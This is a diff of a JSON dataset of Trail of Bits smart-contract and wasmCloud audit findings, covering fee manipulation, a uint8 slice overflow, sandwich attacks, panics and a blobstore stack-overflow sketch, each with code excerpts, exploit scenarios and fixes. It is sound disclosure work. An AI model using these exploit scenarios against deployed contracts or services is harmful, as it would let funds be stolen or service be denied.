_targetRedeemFee, uint256 _randomSwapFee, uint256 _targetSwapFee ) public override virtual { onlyPrivileged(); vaultFactory.setVaultFees( vaultId, _mintFee, _randomRedeemFee, _targetRedeemFee, _randomSwapFee, _targetSwapFee ); } Figure 9.2: The setFees() function in NFTXVaultUpgradeable.sol The eects of these functions are instantaneous, which means users may not be able to react in time to these changes and exit the vaults. Additionally, disabling vault features with the setVaultFeatures() function can trap tokens in the contract. Ultimately, this risk is related to the trustless nature of vault creation, but the NFTX team can take certain measures to minimize the eects. One such measure, which is already in place, is vault verication, in which the vault manager calls the finalizeVault() function to pass her management rights to the zero address. This function then gives the veried status to the vault in the NFTX web application. Exploit Scenario Eve, a malicious manager, creates a new vault for a popular NFT collection. After it gains some user traction, she unilaterally changes the vault fees to the maximum (0.5 ether), which forces users to either pay the high fee or relinquish their tokens. Recommendations Short term, document the risks of interacting with vaults that have not been nalized (i.e., vaults that have managers). Long term, consider adding delays to manager-only functionality (e.g., a certain number of blocks) so that users have time to react and exit the vault.", + "labels": [ + "Trail of Bits", + "Severity: Medium", "Difficulty: Low" ] }, { - "title": "24. SushiswapLiquidityProvider deposits cannot be used to cover withdrawal requests ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Withdrawal requests that require the removal of liquidity from a Sushiswap liquidity pool will revert and cause a system failure. When a user requests a withdrawal of liquidity from the Mosaic system, MosaicVault (via the coverWithdrawRequest() function) queries MosaicHolding to see whether liquidity must be removed from an investment strategy to cover the withdrawal amount (gure 24.1). function _withdraw ( address _accountTo , uint256 _amount , address _tokenIn , address _tokenOut , uint256 _amountOutMin , WithdrawData calldata _withdrawData, bytes calldata _data ) { internal onlyWhitelistedToken(_tokenIn) validAddress(_tokenOut) nonReentrant onlyOwnerOrRelayer whenNotPaused returns ( uint256 withdrawAmount ) IMosaicHolding mosaicHolding = IMosaicHolding(vaultConfig.getMosaicHolding()); require (hasBeenWithdrawn[_withdrawData.id] == false , \"ERR: ALREADY WITHDRAWN\" ); if (_tokenOut == _tokenIn) { require ( mosaicHolding.getTokenLiquidity(_tokenIn, _withdrawData.investmentStrategies) >= _amount, \"ERR: VAULT BAL\" ); } [...] mosaicHolding.coverWithdrawRequest( _withdrawData.investmentStrategies, _tokenIn, withdrawAmount ); [...] } Figure 24.1: The _ withdraw function in MosaicVault :40 4-474 If MosaicHolding s balance of the token being withdrawn ( _tokenIn ) is not sucient to cover the withdrawal, MosaicHolding will iterate through each investment strategy in the _investmentStrategy array and remove enough _tokenIn to cover it. To remove liquidity from an investment strategy, it calls withdrawInvestment() on that strategy (gure 24.2). function coverWithdrawRequest ( address [] calldata _investmentStrategies, address _token , uint256 _amount ) external override { require (hasRole(MOSAIC_VAULT, msg.sender ), \"ERR: PERMISSIONS A-V\" ); uint256 balance = IERC20(_token).balanceOf( address ( this )); if (balance >= _amount) return ; uint256 requiredAmount = _amount - balance; uint8 index ; while (requiredAmount > 0 ) { address strategy = _investmentStrategies[index]; IInvestmentStrategy investment = IInvestmentStrategy(strategy); uint256 investmentAmount = investment.investmentAmount(_token); uint256 amountToWithdraw = 0 ; if (investmentAmount >= requiredAmount) { amountToWithdraw = requiredAmount; requiredAmount = 0 ; } else { amountToWithdraw = investmentAmount; requiredAmount = requiredAmount - investmentAmount; } IInvestmentStrategy.Investment[] memory investments = new IInvestmentStrategy.Investment[]( 1 ); investments[ 0 ] = IInvestmentStrategy.Investment(_token, amountToWithdraw); IInvestmentStrategy(investment).withdrawInvestment(investments, \"\" ); emit InvestmentWithdrawn(strategy, msg.sender ); index++; } require (IERC20(_token).balanceOf( address ( this )) >= _amount, \"ERR: VAULT BAL\" ); } Figure 24.2: The coverWithdrawRequest function in MosaicHolding:217-251 This process works for an investment strategy in which the investments array function argument has a length of 1. However, in the case of SushiswapLiquidityProvider , the withdrawInvestment() function expects the investments array to have a length of 2 (gure 24.3). function withdrawInvestment (Investment[] calldata _investments, bytes calldata _data) external override onlyInvestor nonReentrant { Investment memory investmentA = _investments[ 0 ]; Investment memory investmentB = _investments[ 1 ]; ( uint256 deadline , uint256 liquidity ) = abi.decode(_data, ( uint256 , uint256 )); IERC20Upgradeable pair = IERC20Upgradeable(getPair(investmentA.token, investmentB.token)); pair.safeIncreaseAllowance( address (sushiSwapRouter), liquidity); ( uint256 amountA , uint256 amountB ) = sushiSwapRouter.removeLiquidity( investmentA.token, investmentB.token, liquidity, investmentA.amount, investmentB.amount, address ( this ), deadline ); IERC20Upgradeable(investmentA.token).safeTransfer(mosaicHolding, amountA); IERC20Upgradeable(investmentB.token).safeTransfer(mosaicHolding, amountB); } Figure 24.3: The withdrawInvestment function in SushiswapLiquidityProvider :90-113 Thus, any withdrawal request that requires the removal of liquidity from SushiswapLiquidityProvider will revert. Exploit Scenario Alice wishes to withdraw liquidity ( tokenA ) that she deposited into the Mosaic system. The MosaicHolding contract does not hold enough tokenA to cover the withdrawal and thus tries to withdraw tokenA from the SushiswapLiquidityProvider investment strategy. The request reverts, and Alices withdrawal request fails, leaving her unable to access her funds. Recommendations Short term, avoid depositing user liquidity into the SushiswapLiquidityProvider investment strategy. Long term, take the following steps: Identify and implement one or more data structures that will reduce the technical debt resulting from the use of the InvestmentStrategy interface. Develop a more eective solution for covering withdrawals that does not consistently require withdrawing funds from other investment strategies.", + "title": "10. Lack of zero address check in functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. This issue aects the following contracts and functions: NFTXInventoryStaking.sol __NFTXInventoryStaking_init() NFTXSimpleFeeDistributor.sol setInventoryStakingAddress() addReceiver() changeReceiverAddress() RewardDistributionToken __RewardDistributionToken_init() Exploit Scenario Alice deploys a new version of the NFTXInventoryStaking contract. When she initializes the proxy contract, she inputs the zero address as the address of the _nftxVaultFactory state variable, leading to an incorrect initialization. Recommendations Short term, add zero-value checks on all function arguments to ensure that users cannot accidentally set incorrect values, misconguring the system. Long term, use Slither, which will catch functions that do not have zero checks. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3232,39 +5920,39 @@ ] }, { - "title": "26. MosaicVault and MosaicHolding owner is controlled by a single private key ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The MosaicVault and MosaicHolding contracts manage many critical functionalities, such as those for rescuing funds, managing liquidity, and claiming rewards. The owner of these contracts is a single externally owned account (EOA). As mentioned in TOB-CMP-20 , this creates a single point of failure. Moreover, it makes the owner a high-value target for attackers and increases the incentives for the owner to act maliciously. If the private key is compromised, the system will be compromised too. Exploit Scenario Alice, the owner of the MosaicVault and MosaicHolding contracts, deploys the contracts. MosaicHolding eventually holds assets worth USD 20 million. Eve gains access to Alices machine, upgrades the implementations, pauses MosaicHolding , and drains all funds from the contract. Recommendations Short term, change the owner of the contracts from a single EOA to a multi-signature account. Long term, take the following steps: Develop user documentation on all risks associated with the system, including those associated with privileged users and the existence of a single point of failure. Assess the systems key management infrastructure and document the associated risks as well as an incident response plan.", + "title": "1. Out-of-bounds crash in extract_claims ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-09-wasmCloud-securityreview.pdf", + "body": "The strip_custom_section function does not suciently validate data and crashes when the range is not within the buer (gure 1.1). The function is used in the extract_claims function and is given an untrusted input. In the wasmCloud-otp , even though extract_claims is called as an Erlang NIF (Native Implemented Function) and potentially could bring down the VM upon crashing, the panic is handled gracefully by the Rustler library, resulting in an isolated crash of the Elixir process. if let Some ((id, range )) = payload.as_section() { wasm_encoder::RawSection { id, data: & buf [range] , } .append_to(& mut output); } Figure 1.1: wascap/src/wasm.rs#L161-L167 We found this issue by fuzzing the extract_claims function with cargo-fuzz (gure 2.1). #![no_main] use libfuzzer_sys::fuzz_target; use getrandom::register_custom_getrandom; // TODO: the program wont compile without this, why? fn custom_getrandom (buf: & mut [ u8 ]) -> Result <(), getrandom::Error> { return Ok (()); } register_custom_getrandom!(custom_getrandom); fuzz_target!(|data: & [ u8 ]| { let _ = wascap::wasm::extract_claims(data); }); Figure 1.2: A simple extract_claims fuzzing harness that passes the fuzzer-provided bytes straight to the function After xing the issue (gure 1.3), we fuzzed the function for an extended period of time; however, we found no additional issues. if let Some ((id, range)) = payload.as_section() { if range.end <= buf.len() { wasm_encoder::RawSection { id, data: & buf [range], } .append_to(& mut output); } else { return Err (errors::new(ErrorKind::InvalidCapability)); } } Figure 1.3: The x we applied to continue fuzzing extract_claims . The code requires a new error value because we reused one of the existing ones that likely does not match the semantics. Exploit Scenario An attacker deploys a new module with invalid claims. While decoding the claims, the extract_claims function panics and crashes the Elixir process. Recommendations Short term, x the strip_custom_section function by adding the range check, as shown in the gure 1.3. Add the extract_claims fuzzing harness to the wascap repository and run it for an extended period of time before each release of the library. Long term, add a fuzzing harness for each Rust function that processes user-provided data. References Erlang - NIFs", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "27. The relayer is a single point of failure ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Because the relayer is a centralized service that is responsible for critical functionalities, it constitutes a single point of failure within the Mosaic ecosystem. The relayer is responsible for the following tasks: Managing withdrawals across chains Managing transfers across chains Managing the accrued interest on all users investments Executing cross-chain message call requests Collecting fees for all withdrawals, transfers, and cross-chain message calls Refunding fees in case of failed transfers or withdrawals The centralized design and importance of the relayer increase the likelihood that the relayer will be targeted by an attacker. Exploit Scenario Eve, an attacker, is able to gain root access on the server that runs the relayer. Eve can then shut down the Mosaic system by stopping the relayer service. Eve can also change the source code to trigger behavior that can lead to the drainage of funds. Recommendations Short term, document an incident response plan and monitor exposed ports and services that may be vulnerable to exploitation. Long term, arrange an external security audit of the core and peripheral relayer source code. Additionally, consider implementing a decentralized relayer architecture more resistant to system takeovers.", + "title": "2. Stack overow while enumerating containers in blobstore-fs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-09-wasmCloud-securityreview.pdf", + "body": "The all_dirs function is vulnerable to a stack overow caused by unbounded recursion, triggered by either the presence of circular symlinks inside the root of the blobstore (as congured during startup), or the presence of excessively nested directory inside the same. Because this function is used by FsProvider::list_containers , this issue would result in a denial of service for all actors that use the method exposed by aected blobstores. let mut subdirs: Vec = Vec ::new(); for dir in &dirs { let mut local_subdirs = all_dirs(prefix.join(dir.as_path()).as_path(), prefix); subdirs.append( &mut local_subdirs); } dirs.append( &mut subdirs); dirs Figure 2.1: capability-providers/blobstore-fs/src/fs_utils.rs#L24-L30 Exploit Scenario An attacker creates a circular symlink inside the storage directory. Alternatively, an attacker canunder the right circumstancescreate successively nested directories with a sucient depth to cause a stack overow. blobstore.create_container(ctx, &\"a\".to_string()). await ?; blobstore.create_container(ctx, &\"a/a\".to_string()). await ?; blobstore.create_container(ctx, &\"a/a/a\".to_string()). await ?; ... blobstore.create_container(ctx, &\"a/a/a/.../a/a/a\".to_string()). await ?; blobstore.list_containers(). await ?; Figure 2.2: Possible attack to a vulnerable blobstore In practice, this attack requires the underlying le system to allow exceptionally long lenames, and we have not been able to produce a working attack payload. However, this does not prove that no such le systems exist or will exist in the future. Recommendations Short term, limit the amount of allowable recursion depth to ensure that no stack overow attack is possible given realistic stack sizes, as shown in gure 2.3. pub fn all_dirs(root: &Path, prefix: &Path, depth: i32 ) -> Vec { if depth > 1000 { return vec![]; } ... // Now recursively go in all directories and collect all sub-directories let mut subdirs: Vec = Vec ::new(); for dir in &dirs { let mut local_subdirs = all_dirs( prefix.join(dir.as_path()).as_path(), prefix, depth + 1 ); subdirs.append( &mut local_subdirs); } dirs.append( &mut subdirs); dirs } Figure 2.3: Limiting the amount of allowable recursion depth Long term, consider limiting the reliance on the underlying le system to a minimum by disallowing nesting containers. For example, Base64-encode all container and object names before passing them down to the le system routines. References OWASP Denial of Service Cheat Sheet (\"Input validation\" section)", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, { - "title": "4. Project dependencies contain vulnerabilities ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Although dependency scans did not yield a direct threat to the project under review, npm and yarn audit identied dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a signicant eect on the repositories under review. The output below details these issues. CVE ID", + "title": "3. Denial of service in blobstore-s3 using malicious actor ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-09-wasmCloud-securityreview.pdf", + "body": "The stream_bytes function continues looping until it detects that all of the available bytes have been sent. It does this based on the output of the send_chunk function, which reports the amount of bytes that have been sent by the call. An attacker could send specially crafted responses that cause stream_bytes to continue looping, causing send_chunk to report that no errors were detected while also reporting that no bytes were sent. while bytes_sent < bytes_to_send { let chunk_offset = offset + bytes_sent; let chunk_len = (self.max_chunk_size() as u64).min(bytes_to_send - bytes_sent); bytes_sent += self .send_chunk ( ctx, Chunk { is_last: offset + chunk_len > end_range, bytes: bytes[bytes_sent as usize..(bytes_sent + chunk_len) as usize] .to_vec(), offset: chunk_offset as u64, container_id: bucket_id.to_string(), object_id: cobj.object_id.clone(), }, ) .await?; } Figure 3.1: capability-providers/blobstore-s3/src/lib.rs#L188-L204 Exploit Scenario An attacker can send a maliciously crafted request to get an object from a blobstore-s3 provider, then send successful responses without making actual progress in the transfer by reporting that empty-sized chunks were received. Recommendations Make send_chunk report a failure if a zero-sized response is received.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "10. DoS risk created by cross-chain message call requests on certain networks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Cross-chain message calls that are requested on a low-fee, low-latency network could facilitate a DoS, preventing other users from interacting with the system. If a user, through the MsgSender contract, sent numerous cross-chain message call requests, the relayer would have to act upon the emitted events regardless of whether they were legitimate or part of a DoS attack. Exploit Scenario Eve creates a theoretically innite series of transactions on Arbitrum, a low-fee, low-latency network. The internal queue of the relayer is then lled with numerous malicious transactions. Alice requests a cross-chain message call; however, because the relayer must handle many of Eves transactions rst, Alice has to wait an undened amount of time for her transaction to be executed. Recommendations Short term, create multiple queues that work across the various chains to mitigate this DoS risk. Long term, analyze the implications of the ability to create numerous message calls on low-fee networks and its impact on relayer performance.", + "title": "4. Unexpected panic in validate_token ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-09-wasmCloud-securityreview.pdf", + "body": "The validate_token function from the wascap library panics with an out-of-bounds error when input is given in an unexpected format. The function expects the input to be a valid JWT token with three segments separated by a dot (gure 4.1). This implicit assumption is satised in the code; however, the function is public and does not mention the assumption in its documentation. /// Validates a signed JWT. This will check the signature, expiration time, and not-valid-before time pub fn validate_token (input: &str ) -> Result where T: Serialize + DeserializeOwned + WascapEntity, { } let segments: Vec <& str > = input.split( '.' ).collect(); let header_and_claims = format! ( \"{}.{}\" , segments[ 0 ] , segments[ 1 ] ); let sig = base64::decode_config( segments[ 2 ] , base64::URL_SAFE_NO_PAD)?; ... Figure 4.1: wascap/src/jwt.rs#L612-L641 Exploit Scenario A developer uses the validate_token function expecting it to fully validate the token string. The function receives an untrusted malicious input that forces the program to panic. Recommendations Short term, add input format validation before accessing the segments and a test case with malformed input. Long term, always validate all inputs to functions or document the input assumptions if validation is not in place for a specic reason.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3272,9 +5960,9 @@ ] }, { - "title": "12. Unimplemented getAmountsOut function in Balancer V2 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The getAmountsOut function in the BalancerV2Wrapper contract is unimplemented. The purpose of the getAmountsOut() function, shown in gure 12.1, is to allow users to know the amount of funds they will receive when executing a swap. Because the function does not invoke any functions on the Balancer Vault, a user must actually perform a swap to determine the amount of funds he or she will receive: function getAmountsOut ( address , address , uint256 , bytes calldata ) external pure override returns ( uint256 ) { return 0 ; } Figure 12.1: The getAmountsOut function in BalancerVaultV2Wrapper:43-50 Exploit Scenario Alice, a user of the Composable Finance vaults, wants to swap 100 USDC for DAI on Balancer. Because the getAmountsOut function is not implemented, she is unable to determine how much DAI she will receive before executing the swap. Recommendations Short term, implement the getAmountsOut function and have it call the queryBatchSwap function on the Balancer Vault. Long term, add unit tests for all functions to test all ows. Unit tests will detect incorrect function behavior.", + "title": "5. Incorrect error message when starting actor from le ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-09-wasmCloud-securityreview.pdf", + "body": "The error message when starting an actor from a le contains a string interpolation bug that causes the message to not include the fileref content (gure 5.1). This causes the error message to contain the literal string ${fileref} instead. It is worth noting that the leref content will be included anyway as an attribute. Logger .error( \"Failed to read actor file from ${fileref} : #{ inspect(err) } \" , fileref : fileref ) Figure 5.1: host_core/lib/host_core/actors/actor_supervisor.ex#L301 Recommendations Short term, change the error message to correctly interpolate the fileref string. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3282,9 +5970,9 @@ ] }, { - "title": "28. Lack of events for critical operations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Several critical operations do not trigger events. As a result, it will be dicult to review the correct behavior of the contracts once they have been deployed. For example, the setRelayer function, which is called in the MosaicVault contract to set the relayer address, does not emit an event providing conrmation of that operation to the contracts caller (gure 28.1). function setRelayer ( address _relayer ) external override onlyOwner { relayer = _relayer; } Figure 28.1: The setRelayer() function in MosaicVault:80-82 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to take ownership of the MosaicVault contract. She then sets a new relayer address. Alice, a Composable Finance team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components. 30. Insu\u0000cient protection of sensitive information Severity: Medium Diculty: High Type: Conguration Finding ID: TOB-CMP-30 Target: CrosslayerPortal/env , bribe-protocol/hardhat.config.ts", + "title": "1. Denial-of-service conditions caused by the use of more than 256 slices ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "The owner of a Proteus-based automated market maker (AMM) can update the system parameters to cause a denial of service (DoS) upon the execution of swaps, withdrawals, and deposits. The Proteus AMM engine design supports the creation of an arbitrary number of slices. Slices are used to segment an underlying bonding curve and provide variable liquidity across that curve. The owner of a Proteus contract can update the number of slices by calling the _updateSlices function at any point. When a user requests a swap, deposit, or withdrawal operation, the Proteus contract rst calls the _findSlice function (gure 1.1) to identify the slice in which it should perform the operation. The function iterates across the slices array and returns the index, i, of the slice that has the current ratio of token balances, m. function _findSlice(int128 m) internal view returns (uint8 i) { i = 0; while (i < slices.length) { if (m <= slices[i].mLeft && m > slices[i].mRight) return i; unchecked { ++i; } } // while loop terminates at i == slices.length // if we just return i here we'll get an index out of bounds. return i - 1; } Figure 1.1: The _findSlice() function in Proteus.sol#L1168-1179 However, the index, i, is dened as a uint8. If the owner sets the number of slices to at least 257 (by calling _updateSlices) and the current m is in the 257th slice, i will silently overow, and the while loop will continue until an out-of-gas (OOG) exception occurs. If a deposit, withdrawal, or swap requires the 257th slice to be accessed, the operation will fail because the _findSlice function will be unable to reach that slice. Exploit Scenario Eve creates a seemingly correct Proteus-based primitive (one with only two slices near the asymptotes of the bonding curve). Alice deposits assets worth USD 100,000 into a pool. Eve then makes a deposit of X and Y tokens that results in a token balance ratio, m, of 1. Immediately thereafter, Eve calls _updateSlices and sets the number of slices to 257, causing the 256th slice to have an m of 1.01. Because the current m resides in the 257th slice, the _findSlice function will be unable to nd that slice in any subsequent swap, deposit, or withdrawal operation. The system will enter a DoS condition in which all future transactions will fail. If Eve identies an arbitrage opportunity on another exchange, Eve will be able to call _updateSlices again, use the unlocked curve to buy the token of interest, and sell that token on the other exchange for a pure prot. Eectively, Eve will be able to steal user funds. Recommendations Short term, change the index, i, from the uint8 type to uint256; alternatively, create an upper limit for the number of slices that can be created and ensure that i will not overow when the _findSlice function searches through the slices array. Long term, consider adding a delay between a call to _updateSlices and the time at which the call takes eect on the bonding curve. This will allow users to withdraw from the system if they are unhappy with the new parameters. Additionally, consider making slices immutable after their construction; this will signicantly reduce the risk of undened behavior.", "labels": [ "Trail of Bits", "Severity: High", @@ -3292,39 +5980,39 @@ ] }, { - "title": "5. Accrued interest is not attributable to the underlying investor on-chain ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "When an investor earns interest-bearing tokens by lending funds through Mosaics investment strategies, the tokens are not directly attributed to the investor by on-chain data. The claim() function, which can be called only by the owner of the MosaicHolding contract, is dened in the contract and used to redeem interest-bearing tokens from protocols such as Aave and Compound (gure 5.1). The underlying tokens of these protocols lending pools are provided by users who are interacting with the Mosaic system and wish to earn rewards on their idle funds. function claim ( address _investmentStrategy , bytes calldata _data) external override onlyAdmin validAddress(_investmentStrategy) { require (investmentStrategies[_investmentStrategy], \"ERR: STRATEGY NOT SET\" ); address rewardTokenAddress = IInvestmentStrategy(_investmentStrategy).claimTokens(_data); emit TokenClaimed(_investmentStrategy, rewardTokenAddress); } Figure 5.1: The claim function in MosaicHolding:270-279 During the execution of claim() , the internal claimTokens() function calls into the AaveInvestmentStrategy , CompoundInvestmentStrategy , or SushiswapLiquidityProvider contract, which eectively transfers its balance of the interest-bearing token directly to the MosaicHolding contract. Figure 5.2 shows the claimTokens() function call in AaveInvestmentStrategy . function claimTokens ( bytes calldata data) external override onlyInvestor returns ( address ) { address token = abi.decode(data, ( address )); ILendingPool lendingPool = ILendingPool(lendingPoolAddressesProvider.getLendingPool()); DataTypes.ReserveData memory reserve = lendingPool.getReserveData(token); IERC20Upgradeable(reserve.aTokenAddress).safeTransfer( mosaicHolding, IERC20Upgradeable(reserve.aTokenAddress).balanceOf( address ( this )) ); return reserve.aTokenAddress; } Figure 5.2: The c laimTokens function in AaveInvestmentStrategy:58-68 However, there is no identiable mapping or data structure attributing a percentage of those rewards to a given user. The o-chain relayer service is responsible for holding such mappings and rewarding users with the interest they have accrued upon withdrawal (see the r elayer bot assumptions in the Project Coverage section). Exploit Scenario Investors Alice and Bob, who wish to earn interest on their idle USDC, decide to use the Mosaic system to provide loans. Mosaic invests their money in Aaves lending pool for USDC. However, there is no way for the parties to discern their ownership stakes in the lending pool through the smart contract logic. The owner of the contract decides to call the claim() function and redeem all aUSDC associated with Alices and Bobs positions. When Bob goes to withdraw his funds, he has to trust that the relayer will send him his claim on the aUSDC without any on-chain verication. Recommendations Short term, consider implementing a way to identify the amount of each investors stake in a given investment strategy. Currently, the relayer is responsible for tracking all rewards. Long term, review the privileges and responsibilities of the relayer and architect a more robust solution for managing investments.", + "title": "2. LiquidityPoolProxy owners can steal user funds ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "The LiquidityPoolProxy contract implements the IOceanPrimitive interface and can integrate with the Ocean contract as a primitive. The proxy contract calls into an implementation contract to perform deposit, swap, and withdrawal operations (gure 2.1). function swapOutput(uint256 inputToken, uint256 inputAmount) public view override returns (uint256 outputAmount) { (uint256 xBalance, uint256 yBalance) = _getBalances(); outputAmount = implementation.swapOutput(xBalance, yBalance, inputToken == xToken ? 0 : 1, inputAmount); } Figure 2.1: The swapOutput() function in LiquidityPoolProxy.sol#L3947 However, the owner of a LiquidityPoolProxy contract can perform the privileged operation of changing the underlying implementation contract via a call to setImplementation (gure 2.2). The owner could thus replace the underlying implementation with a malicious contract to steal user funds. function setImplementation(address _implementation) external onlyOwner { } implementation = ILiquidityPoolImplementation(_implementation); Figure 2.2: The setImplementation() function in LiquidityPoolProxy.sol#L2833 This level of privilege creates a single point of failure in the system. It increases the likelihood that a contracts owner will be targeted by an attacker and incentivizes the owner to act maliciously. Exploit Scenario Alice deploys a LiquidityPoolProxy contract as an Ocean primitive. Eve gains access to Alices machine and upgrades the implementation to a malicious contract that she controls. Bob attempts to swap USD 1 million worth of shDAI for shUSDC by calling computeOutputAmount. Eves contract returns 0 for outputAmount. As a result, the malicious primitives balance of shDAI increases by USD 1 million, but Bob does not receive any tokens in exchange for his shDAI. Recommendations Short term, document the functions and implementations that LiquidityPoolProxy contract owners can change. Additionally, split the privileges provided to the owner role across multiple roles to ensure that no one address has excessive control over the system. Long term, develop user documentation on all risks associated with the system, including those associated with privileged users and the existence of a single point of failure.", "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "6. User funds can become trapped in nonstandard token contracts ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "If a users funds are transferred to a token contract that violates the ERC20 standard, the funds may become permanently trapped in that token contract. In the MsgReceiver contract, there are six calls to the transfer() function. See gure 6.1 for an example. function approveERC20TokenAndForwardCall( uint256 _feeAmount, address _feeToken, address _feeReceiver, address _token, uint256 _amount, bytes32 _id, address _contract, bytes calldata _data ) external payable onlyOwnerOrRelayer returns ( bool success, bytes memory returnData) { require ( IMsgReceiverFactory(msgReceiverFactory).whitelistedFeeTokens(_feeToken), \"Fee token is not whitelisted\" ); require (!forwarded[_id], \"call already forwared\" ); //approve tokens to _contract IERC20(_token).safeIncreaseAllowance(_contract, _amount); // solhint-disable-next-line avoid-low-level-calls (success, returnData) = _contract.call{value: msg.value }(_data); require (success, \"Failed to forward function call\" ); uint256 balance = IERC20(_feeToken).balanceOf( address ( this )); require (balance >= _feeAmount, \"Not enough tokens for the fee\" ); forwarded[_id] = true ; IERC20(_feeToken).transfer(_feeReceiver, _feeAmount); } Figure 6.1: The approveERC20TokenAndForwardCall function in MsgReceiver:98- When implemented in accordance with the ERC20 standard, the transfer() function returns a boolean indicating whether a transfer operation was successful. However, tokens that implement the ERC20 interface incorrectly may not return true upon a successful transfer, in which case the transaction will revert and the users funds will be locked in the token contract. Exploit Scenario Alice, the owner of the MsgReceiverFactory contract, adds a fee token that is controlled by Eve. Eves token contract incorrectly implements the ERC20 interface. Bob interacts with MsgReceiver and calls a function that executes a transfer to _feeReceiver , which is controlled by Eve. Because Eves fee token contract does not provide a return value, Bobs transfer reverts. Recommendations Short term, use safeTransfer() for token transfers and use the SafeERC20 library for interactions with ERC20 token contracts. Long term, develop a process for onboarding new fee tokens. Review our Token Integration Checklist for guidance on the onboarding process. References Missing Return Value Bug", + "title": "3. Risk of sandwich attacks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "The Proteus liquidity pool implementation does not use a parameter to prevent slippage. Without such a parameter, there is no guarantee that users will receive any tokens in a swap. The LiquidityPool contracts computeOutputAmount function returns an outputAmount value indicating the number of tokens a user should receive in exchange for the inputAmount. Many AMM protocols enable users to specify the minimum number of tokens that they would like to receive in a swap. This minimum number of tokens (indicated by a slippage parameter) protects users from receiving fewer tokens than expected. As shown in gure 3.1, the computeOutputAmount function signature includes a 32-byte metadata eld that would allow a user to encode a slippage parameter. function computeOutputAmount( uint256 inputToken, uint256 outputToken, uint256 inputAmount, address userAddress, bytes32 metadata ) external override onlyOcean returns (uint256 outputAmount) { Figure 3.1: The signature of the computeOutputAmount() function in LiquidityPool.sol#L192198 However, this eld is not used in swaps (gure 3.2) and thus does not provide any protection against excessive slippage. By using a bot to sandwich a users trade, an attacker could increase the slippage incurred by the user and prot o of the spread at the users expense. function computeOutputAmount( uint256 inputToken, uint256 outputToken, uint256 inputAmount, address userAddress, bytes32 metadata ) external override onlyOcean returns (uint256 outputAmount) { ComputeType action = _determineComputeType(inputToken, outputToken); [...] } else if (action == ComputeType.Swap) { // Swap action + computeOutput context => swapOutput() outputAmount = swapOutput(inputToken, inputAmount); emit Swap( inputAmount, outputAmount, metadata, userAddress, (inputToken == xToken), true ); } [...] Figure 3.2: Part of the computeOutputAmount() function in LiquidityPool.sol#L192260 Exploit Scenario Alice wishes to swap her shUSDC for shwETH. Because the computeOutputAmount functions metadata eld is not used in swaps to prevent excessive slippage, the trade can be executed at any price. As a result, when Eve sandwiches the trade with a buy and sell order, Alice sells the tokens without purchasing any, eectively giving away tokens for free. Recommendations Short term, document the fact that protocols that choose to use the Proteus AMM engine should encode a slippage parameter in the metadata eld. The use of this parameter will reduce the likelihood of sandwich attacks against protocol users. Long term, ensure that all calls to computeOutputAmount and computeInputAmount use slippage parameters when necessary, and consider relying on an oracle to ensure that the amount of slippage that users can incur in trades is appropriately limited.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "13. Use of MsgReceiver to check _feeToken status leads to unnecessary gas consumption ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Checking the whitelist status of a token only on the receiving end of a message call can lead to excessive gas consumption. As part of a cross-chain message call, all functions in the MsgReceiver contract check whether the token used for the payment to _feeReceiver ( _feeToken ) is a whitelisted token (gure 13.1). Tokens are whitelisted by the owner of the MsgReceiverFactory contract. function approveERC20TokenAndForwardCall( uint256 _feeAmount, address _feeToken, address _feeReceiver, address _token, uint256 _amount, bytes32 _id, address _contract, bytes calldata _data ) external payable 